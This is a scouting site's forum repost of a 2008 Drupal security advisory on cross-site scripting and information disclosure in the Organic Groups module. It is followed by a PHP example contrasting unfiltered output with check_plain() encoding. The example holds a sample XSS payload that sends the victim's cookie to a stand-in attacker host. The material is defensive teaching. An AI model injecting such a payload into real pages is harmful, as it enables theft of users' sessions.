Scoutnet vzw

We connect scouts!
Posted: 02 Jul 2008 23:05
Author: Site Admin (registered 17 Jul 2002, Wetteren; 1522 posts)
------------SA-2008-040 - ORGANIC GROUPS - CROSS SITE SCRIPTING AND INFORMATION DISCLOSURE------------

* Advisory ID: DRUPAL-SA-2008-040
* Project: Organic Groups (third-party module)
* Versions: 5.x and 6.x
* Date: 2008-July-02
* Security risk: Less Critical
* Exploitable from: Remote
* Vulnerability: Cross site scripting and information disclosure

------------DESCRIPTION------------

Organic groups enables users to create and manage their own 'groups'. Each group can be subscribed to, and includes a group home page where subscribers can communicate amongst themselves. Two vulnerabilities were found in the module.

Cross Site Scripting

The module displays certain values without appropriate filtering. Malicious group owners are able to exploit this issue and insert arbitrary HTML and script code into pages. Such a cross site scripting (XSS) attack [ http://en.wikipedia.org/wiki/Cross-site_scripting ] may lead to administrator access for the malicious user.

Prerequisites:

* Audience check boxes must be disabled (enabled by default).
* Site must allow untrusted users to create groups.
* Malicious group owner must convince others to join his group.
* Users may be attacked if they try to start a new discussion in the group (not a comment).

Information Disclosure

Malicious users may discover the title of private groups. Other group details and the contents of private posts are not compromised.

Prerequisites:

* OG Access module must be enabled.
* Site must use the private groups feature.

------------VERSIONS AFFECTED------------

* Versions of Organic groups for Drupal 5.x prior to 5.x-7.3
* Versions of Organic groups for Drupal 6.x prior to 6.x-1.0-RC1

Drupal core is not affected. If you do not use the Organic groups module, there is nothing you need to do.

------------SOLUTION------------

Install the latest version and run update.php:

* If you use Organic groups for Drupal 5.x upgrade to Organic groups 5.x-7.3 [ http://drupal.org/node/277854 ]
* If you use Organic groups for Drupal 6.x upgrade to Organic groups 6.x-1.0-RC1 [ http://drupal.org/node/277869 ]

Also see the Organic groups project page [ http://drupal.org/project/og ].

------------REPORTED BY------------

* Cross site scripting by fago [ http://drupal.org/user/16747 ].
* Information disclosure by John Forsythe [ http://drupal.org/user/101901 ].

------------CONTACT------------

The security contact for Drupal can be reached at security at drupal.org or via the form at [ http://drupal.org/contact ] and by selecting the security issues category.


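The cross site scripting issue in the advisory above ("displays certain values without appropriate filtering") comes down to group-owner-controlled text reaching the page without output encoding. The PHP snippet below is an added illustration for this repost, not code from the Organic groups module or from Drupal: the group array, the attacker string and the two render functions are hypothetical, and `check_plain()` is re-created as a stand-in so the script runs without a Drupal bootstrap (Drupal 5/6's own `check_plain()` is `htmlspecialchars($text, ENT_QUOTES, 'UTF-8')` preceded by a UTF-8 validity check). It shows the same owner-supplied value rendered raw, where it both breaks out of an attribute and injects a script element, and rendered through `check_plain()`, where it stays inert text.

```php
<?php
// Added illustration (not Organic groups / Drupal code). Hypothetical scenario: a group
// owner controls $group['title'], and a theme prints it into a link label and a title
// attribute, as a group listing or the "post in group" form might.

// Stand-in for Drupal 5/6 check_plain(); only defined when no Drupal bootstrap is loaded.
// ENT_QUOTES matters: it encodes both " and ', so the value cannot close an attribute.
if (!function_exists('check_plain')) {
  function check_plain($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
  }
}

// Constructed attacker input: closes the title="..." attribute, then injects a script
// that ships the victim's cookie to a hypothetical attacker host.
$group = array(
  'nid'   => 42,
  'title' => '"><script>new Image().src="http://attacker.example/c?"+document.cookie</script>Scouts',
);

// Vulnerable pattern: the raw value is concatenated straight into markup.
// (The nid is cast to int, so only the title is attacker-controlled here.)
function render_group_link_unfiltered(array $group) {
  return '<a href="/node/' . (int) $group['nid'] . '" title="' . $group['title'] . '">'
       . $group['title'] . '</a>';
}

// Hardened pattern: every owner-controlled value goes through check_plain() at output
// time, once per context in which it is printed (attribute value and element text).
function render_group_link_filtered(array $group) {
  $title = check_plain($group['title']);
  return '<a href="/node/' . (int) $group['nid'] . '" title="' . $title . '">'
       . $title . '</a>';
}

// Crude check used only to make the difference visible: does a real <script> start tag
// survive rendering? In the filtered output it appears as &lt;script&gt;, which does not match.
function contains_live_script($html) {
  return stripos($html, '<script') !== false;
}

$unsafe = render_group_link_unfiltered($group);
$safe   = render_group_link_filtered($group);

echo "Unfiltered: $unsafe\n";
echo "Filtered:   $safe\n";
echo 'Unfiltered output contains a live <script> tag: ' . (contains_live_script($unsafe) ? 'yes' : 'no') . "\n";
echo 'Filtered output contains a live <script> tag:   ' . (contains_live_script($safe) ? 'yes' : 'no') . "\n";
```

Run it with `php example.php`. The point the advisory's wording leaves implicit is that the encoding belongs at output, in the theme or render code, for each place the value is printed; encoding at storage time is not a substitute, because the same stored string is later printed into different contexts. `check_plain()` is correct for plain-text values such as a group title; a value that is allowed to carry a restricted set of HTML tags would go through Drupal's `filter_xss()` instead, and a user-controlled URL in an `href` needs URL-specific handling on top of plain encoding.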
 